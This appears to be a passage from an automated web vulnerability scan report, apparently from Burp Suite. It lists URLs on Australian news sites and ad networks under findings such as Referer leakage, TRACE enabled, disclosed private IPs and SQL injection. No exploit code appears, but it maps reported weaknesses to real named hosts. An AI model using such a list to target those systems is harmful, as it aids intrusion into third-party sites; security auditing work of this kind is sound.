9.62. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

9.63. http://rc.d.chango.com/m/rc

9.64. http://rp.gwallet.com/r1/ruum

9.65. http://statse.webtrendslive.com/dcsfoa7no000004nwf1r8lgm7_4i7i/dcs.gif

9.66. http://statse.webtrendslive.com/dcsw4t3cy00000ctu0wdzjrq1_3q8k/dcs.gif

9.67. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

9.68. http://tap.rubiconproject.com/oz/feeds/targus/profile

9.69. http://user.lucidmedia.com/clicksense/user

9.70. http://web.adblade.com/imps.php

9.71. http://www.abc.net.au/includes/scripts/global.js

9.72. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css

9.73. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css

9.74. http://www.abc.net.au/local/global_css/common_modules/m60_login.css

9.75. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css

9.76. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css

9.77. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css

9.78. http://www.abc.net.au/local/global_css/news/styles.css

9.79. http://www.abc.net.au/local/global_css/palettes/generic.css

9.80. http://www.abc.net.au/local/global_css/palettes/paletteA.css

9.81. http://www.abc.net.au/local/global_css/styles.css

9.82. http://www.abc.net.au/local/global_css/template/styles.css

9.83. http://www.abc.net.au/local/global_css/yaml/central_draft.css

9.84. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css

9.85. http://www.abc.net.au/local/global_scripts/contribute/functions.js

9.86. http://www.abc.net.au/local/global_scripts/general.min.js

9.87. http://www.abc.net.au/local/includes/scripts/city_include.js

9.88. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js

9.89. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js

9.90. http://www.abc.net.au/res/abc/styles/screen.css

9.91. http://www.abc.net.au/res/libraries/abcjs/abc.js

9.92. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js

9.93. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

9.94. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

9.95. http://www.investsmart.com.au/promostrip/images/Norm_house120.jpg

9.96. http://www.wtp101.com/pull_sync

10. Password field with autocomplete enabled

10.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

10.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

11. ASP.NET debugging enabled

12. Referer-dependent response

12.1. http://ad.yieldmanager.com/imp

12.2. http://adnxs.revsci.net/imp

12.3. http://www.facebook.com/connect/connect.php

12.4. http://www.facebook.com/plugins/like.php

12.5. http://www.facebook.com/plugins/likebox.php

12.6. http://www.facebook.com/plugins/recommendations.php

13. Cross-domain POST

13.1. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

13.2. http://www.smh.com.au/business

14. Cross-domain Referer leakage

14.1. http://ad-apac.doubleclick.net/adj/onl.smh.bus/bus/homepage

14.2. http://ad-apac.doubleclick.net/adj/onl.wa.news/news/homepage

14.3. http://ad.agkn.com/iframe!t=1131!

14.4. http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3

14.5. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

14.6. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

14.7. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews

14.8. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews

14.9. http://ad.au.doubleclick.net/adj/ndm.news/news/weather

14.10. http://ad.au.doubleclick.net/adj/ndm.news/news/weather

14.11. http://ad.au.doubleclick.net/adj/ndm.ntn/news/home

14.12. http://ad.au.doubleclick.net/adj/ndm.ntn/news/home

14.13. http://ad.au.doubleclick.net/adj/ndm.ntn/news/local

14.14. http://ad.au.doubleclick.net/adj/ndm.ntn/news/local

14.15. http://ad.au.doubleclick.net/adj/ndm.tmrc/news/home

14.16. http://ad.au.doubleclick.net/adj/ndm.tmrc/news/local

14.17. http://ad.au.doubleclick.net/adj/ndm.tst/business/businessold/news

14.18. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2

14.19. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9

14.20. http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3

14.21. http://ad.turn.com/server/ads.js

14.22. http://ad.yieldmanager.com/iframe3

14.23. http://ad.yieldmanager.com/iframe3

14.24. http://ad.yieldmanager.com/iframe3

14.25. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/

14.26. http://cm.g.doubleclick.net/pixel

14.27. http://cm.g.doubleclick.net/pixel

14.28. http://cm.g.doubleclick.net/pixel

14.29. http://cms.ad.yieldmanager.net/v1/cms

14.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.37. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.38. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.39. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.40. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

14.41. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.42. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.43. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.44. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.45. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.46. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.47. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.48. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.49. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

14.50. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.51. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.52. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.53. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.54. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.55. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

14.56. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.57. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.60. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

14.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

14.62. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

14.63. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

14.64. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

14.65. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

14.66. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

14.67. http://pixel.invitemedia.com/rubicon_sync

14.68. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

14.69. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

14.70. http://tools.themercury.com.au/feeds/feed-with-lead.php

14.71. http://tools.themercury.com.au/feeds/feed-with-lead.php

14.72. http://weather.news.com.au/widgets/local/

14.73. http://weather.news.com.au/widgets/monthly-almanac/

14.74. http://weather.news.com.au/widgets/radar/

14.75. http://weather.news.com.au/widgets/satellite/

14.76. http://web.adblade.com/imps.php

14.77. http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/

14.78. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

14.79. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

14.80. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

14.81. http://www.facebook.com/connect/connect.php

14.82. http://www.facebook.com/plugins/likebox.php

14.83. http://www.facebook.com/plugins/likebox.php

14.84. http://www.facebook.com/plugins/likebox.php

14.85. http://www.facebook.com/plugins/recommendations.php

14.86. http://www.google.com/search

14.87. http://www.news.com.au/breaking-news

14.88. http://www.weatherchannel.com.au/weather-widget.aspx

15. Cross-domain script include

15.1. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

15.2. http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3

15.3. http://ad.yieldmanager.com/iframe3

15.4. http://ad.yieldmanager.com/iframe3

15.5. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

15.6. http://au.news.yahoo.com/thewest/business/

15.7. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/

15.8. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

15.9. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

15.10. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

15.11. http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

15.12. http://news.smh.com.au/favicon.ico

15.13. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.14. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.15. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.16. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.17. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.18. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

15.19. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.20. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.21. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.22. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.23. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

15.24. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

15.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

15.26. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

15.27. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

15.28. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

15.29. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

15.30. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

15.31. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

15.32. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars.homepage_min.js

15.33. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

15.34. http://weather.news.com.au/wa/perth/perth

15.35. http://weather.news.com.au/widgets/local/

15.36. http://weather.news.com.au/widgets/monthly-almanac/

15.37. http://weather.news.com.au/widgets/radar/

15.38. http://weather.news.com.au/widgets/satellite/

15.39. http://web.adblade.com/imps.php

15.40. http://www.6pr.com.au/

15.41. http://www.6pr.com.au/blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html

15.42. http://www.6pr.com.au/not_found.html

15.43. http://www.6pr.com.au/trolls-attack-shark-victim/20110907-1jxqv.html

15.44. http://www.7perth.com.au/view/2/

15.45. http://www.7perth.com.au/view/about/

15.46. http://www.7perth.com.au/view/seven-news/

15.47. http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/

15.48. http://www.facebook.com/connect/connect.php

15.49. http://www.facebook.com/plugins/likebox.php

15.50. http://www.news.com.au/breaking-news

15.51. http://www.ntnews.com.au/

15.52. http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html

15.53. http://www.perthnow.com.au/

15.54. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

15.55. http://www.smh.com.au/business

15.56. http://www.themercury.com.au/

15.57. http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html

15.58. http://www.watoday.com.au/

15.59. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

15.60. http://www.weatherchannel.com.au/weather-widget.aspx

16. TRACE method is enabled

16.1. http://bh.contextweb.com/

16.2. http://image2.pubmatic.com/

16.3. http://m.xp1.ru4.com/

16.4. http://matcher-rbc.bidder7.mookie1.com/

16.5. http://optimized-by.rubiconproject.com/

16.6. http://pixel.rubiconproject.com/

16.7. http://secure-au.imrworldwide.com/

16.8. http://tap.rubiconproject.com/

16.9. http://www.7perth.com.au/

17. Email addresses disclosed

17.1. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/controls.js

17.2. http://feeds.mycareer.com.au/jobresults

17.3. http://media.mytalk.com.au/6pr/audio/paul_papalia_070911.mp3

17.4. http://media.news.com.au/cs/newscomau/v1.5/base-patch-v2.js

17.5. http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js

17.6. http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js

17.7. http://weather.news.com.au/includes/optigraph/optigraph.min.js

17.8. http://weather.news.com.au/includes/optigraph/thermometer.min.js

17.9. http://www.7perth.com.au/js/wforms.js

17.10. http://www.7perth.com.au/view/2/

17.11. http://www.7perth.com.au/view/seven-news/

17.12. http://www.abc.net.au/includes/scripts/jquery/plugins/jquery.hoverIntent.minified.js

17.13. http://www.bcl.com.au/highlight.js

17.14. http://www.ntnews.com.au/scripts/form-validate.js

17.15. http://www.ntnews.com.au/scripts/global.js

17.16. http://www.perthnow.com.au/

17.17. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

17.18. http://www.themercury.com.au/scripts/form-validate.js

17.19. http://www.watoday.com.au/

17.20. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

18. Private IP addresses disclosed

18.1. http://connect.facebook.net/en_GB/all.js

18.2. http://external.ak.fbcdn.net/safe_image.php

18.3. http://external.ak.fbcdn.net/safe_image.php

18.4. http://media.news.com.au/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js

18.5. http://static.ak.fbcdn.net/connect/xd_proxy.php

18.6. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Ii1cTFrq_I2.js

18.7. http://www.facebook.com/connect/connect.php

18.8. http://www.facebook.com/connect/connect.php

18.9. http://www.facebook.com/extern/login_status.php

18.10. http://www.facebook.com/extern/login_status.php

18.11. http://www.facebook.com/extern/login_status.php

18.12. http://www.facebook.com/extern/login_status.php

18.13. http://www.facebook.com/extern/login_status.php

18.14. http://www.facebook.com/extern/login_status.php

18.15. http://www.facebook.com/plugins/like.php

18.16. http://www.facebook.com/plugins/like.php

18.17. http://www.facebook.com/plugins/like.php

18.18. http://www.facebook.com/plugins/like.php

18.19. http://www.facebook.com/plugins/like.php

18.20. http://www.facebook.com/plugins/like.php

18.21. http://www.facebook.com/plugins/like.php

18.22. http://www.facebook.com/plugins/like.php

18.23. http://www.facebook.com/plugins/likebox.php

18.24. http://www.facebook.com/plugins/likebox.php

18.25. http://www.facebook.com/plugins/likebox.php

18.26. http://www.facebook.com/plugins/likebox.php

18.27. http://www.facebook.com/plugins/recommendations.php

18.28. http://www.google.com/sdch/StnTz5pY.dct

19. Robots.txt file

19.1. http://a.analytics.yahoo.com/fpc.pl

19.2. http://ad.turn.com/server/pixel.htm

19.3. http://ad.yieldmanager.com/imp

19.4. http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5

19.5. http://adsfac.us/ag.asp

19.6. http://api.twitter.com/1/statuses/user_timeline.json

19.7. http://au.adserver.yahoo.com/a

19.8. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

19.9. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/

19.10. http://b.scorecardresearch.com/beacon.js

19.11. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

19.12. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

19.13. http://cdn.turn.com/server/ddc.htm

19.14. http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46

19.15. http://cm.au.thewest.overture.com/js_flat_1_0/

19.16. http://content.yieldmanager.edgesuite.net/atoms/14/8d/69/e5/148d69e533c1134c3b11f6d485608.swf

19.17. http://d3.zedo.com/jsc/d3/ff2.html

19.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

19.19. http://data.weatherzone.com.au/json/animator/

19.20. http://g-pixel.invitemedia.com/gmatcher

19.21. http://g.ca.bid.invitemedia.com/rubicon_imp

19.22. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

19.23. http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf

19.24. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

19.25. http://l.addthiscdn.com/live/t00/250lo.gif

19.26. http://m.xp1.ru4.com/activity

19.27. http://map.media6degrees.com/orbserv/hbpix

19.28. http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

19.29. http://pagead2.googlesyndication.com/pagead/imgad

19.30. http://pixel.adblade.com/log.php

19.31. http://pixel.invitemedia.com/data_sync

19.32. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

19.33. http://row.bc.yahoo.com/b

19.34. http://s0.2mdn.net/2878385/rsvp_type_300x125.swf

19.35. http://s1.2mdn.net/2977403/Yahoo_Homeroom_Texas_300x250.swf

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.37. http://sync.mathtag.com/sync/img

19.38. http://tags.mathtag.com/view/js/

19.39. http://traktr.news.com.au/esi/traktr.js

19.40. http://web.adblade.com/imps.php

19.41. http://webservice.theweather.com.au/crossdomain.xml

19.42. http://www.6pr.com.au/

19.43. http://www.7perth.com.au/view/seven-news/

19.44. http://www.abc.net.au/perth/news/

19.45. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

19.46. http://www.bcl.com.au/perth/news.htm

19.47. http://www.facebook.com/extern/login_status.php

19.48. http://www.google-analytics.com/__utm.gif

19.49. http://www.news.com.au/mercury/images/bg-local-guides.gif

19.50. http://www.perthnow.com.au/

19.51. http://www.smh.com.au/images/promo/St_George_logo60x26.jpg

19.52. http://www.themercury.com.au/

19.53. http://www.watoday.com.au/

20. HTML does not specify charset

20.1. http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3

20.2. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16

20.3. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2

20.4. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9

20.5. http://ad.yieldmanager.com/iframe3

20.6. http://cti.w55c.net/ct/cms-2-frame.html

20.7. http://cti.w55c.net/ct/rubicon-cms2.html

20.8. http://d3.zedo.com/jsc/d3/ff2.html

20.9. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

20.10. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

20.11. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

20.12. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

20.13. http://pixel.invitemedia.com/data_sync

20.14. http://pixel.invitemedia.com/rubicon_sync

20.15. http://resources.6pr.f2.com.au/myTalkNetwork/6pr/css/img/bg_weather.gif

20.16. http://resources.smh.com.au/common/media-common-1.0/css/output/common.skin.breakingnewsnational_min.css

20.17. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg/%22

20.18. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg/%22

20.19. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22

20.20. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/25/tn_204251.jpg/%22

20.21. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/30/tn_205931.jpg/%22

20.22. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/09/02/tn_206341.jpg/%22

20.23. http://tools.ntnews.com.au/favicon.ico

20.24. http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php

20.25. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php

20.26. http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php

20.27. http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php

20.28. http://tools.ntnews.com.au/weather/weather_panel.php

20.29. http://tools.ntnews.com.au/yoursay/article_page_comments.php

20.30. http://tools.ntnews.com.au/yoursay/article_single_comment.php

20.31. http://tools.themercury.com.au/feeds/feed-ticker.php

20.32. http://tools.themercury.com.au/feeds/feed-with-lead.php

20.33. http://tools.themercury.com.au/misc/datetime.php

20.34. http://tools.themercury.com.au/photo-gallery/featuredgallery.php

20.35. http://tools.themercury.com.au/search-results/adsense_js.php

20.36. http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php

20.37. http://tools.themercury.com.au/video/featuredvideo.php

20.38. http://tools.themercury.com.au/weather/weather_inc.php

20.39. http://tools.themercury.com.au/yoursay/article_page_comments.php

20.40. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php

20.41. http://uac.advertising.com/wrapper/aceUACping.htm

20.42. http://weather.news.com.au/wa/perth/perth

20.43. http://weather.news.com.au/widgets/local/

20.44. http://weather.news.com.au/widgets/monthly-almanac/

20.45. http://weather.news.com.au/widgets/radar/

20.46. http://weather.news.com.au/widgets/satellite/

20.47. http://www.abc.net.au/res/abc/submenus.htm

20.48. http://www.bcl.com.au/perth/news.htm

21. Content type incorrectly stated

21.1. http://a3.twimg.com/profile_images/195539297/6PRlogo-Thumbnail-48x48_normal.gif

21.2. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090

21.3. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList

21.4. http://news.smh.com.au/action/pingServerAction

21.5. http://resources.news.com.au/cs/newscomau/images/favicon.ico

21.6. http://resources.news.com.au/cs/perthnow/images/favicon.ico

21.7. http://resources0.news.com.au/images/2010/06/15/1225879/957752-wine-glass.gif

21.8. http://resources2.news.com.au/images/2011/08/01/1226106/127606-economy.gif

21.9. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22

21.10. http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php

21.11. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php

21.12. http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php

21.13. http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php

21.14. http://tools.ntnews.com.au/weather/weather_panel.php

21.15. http://tools.ntnews.com.au/yoursay/article_page_comments.php

21.16. http://tools.ntnews.com.au/yoursay/article_single_comment.php

21.17. http://tools.themercury.com.au/feeds/feed-ticker.php

21.18. http://tools.themercury.com.au/feeds/feed-with-lead.php

21.19. http://tools.themercury.com.au/misc/datetime.php

21.20. http://tools.themercury.com.au/photo-gallery/featuredgallery.php

21.21. http://tools.themercury.com.au/search-results/adsense_js.php

21.22. http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php

21.23. http://tools.themercury.com.au/video/featuredvideo.php

21.24. http://tools.themercury.com.au/weather/weather_inc.php

21.25. http://tools.themercury.com.au/yoursay/article_page_comments.php

21.26. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php

21.27. http://www.7perth.com.au/javascript.js

21.28. http://www.abc.net.au/favicon.ico

21.29. http://www.abc.net.au/res/abc/submenus.htm

21.30. http://www.bcl.com.au/perth/x-topimg.txt

21.31. http://www.bcl.com.au/x-footer.txt

21.32. http://www.facebook.com/extern/login_status.php

21.33. http://www.ntnews.com.au/images/global/icons/arrow-orange.gif

21.34. http://www.ntnews.com.au/scripts/track-call.js

21.35. http://www.ntnews.com.au/scripts/track-header.js

21.36. http://www.smh.com.au/action/pingServerAction

21.37. http://www.smh.com.au/favicon.ico

21.38. http://www.themercury.com.au/images/horoscopes-background.gif

21.39. http://www.themercury.com.au/scripts/track-call.js

21.40. http://www.themercury.com.au/scripts/track-header.js

21.41. http://www.watoday.com.au/action/pingServerAction

22. Content type is not specified

22.1. http://ad.yieldmanager.com/st

22.2. http://pcm3.map.pulsemgr.com/uds/pc



1. SQL injection
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

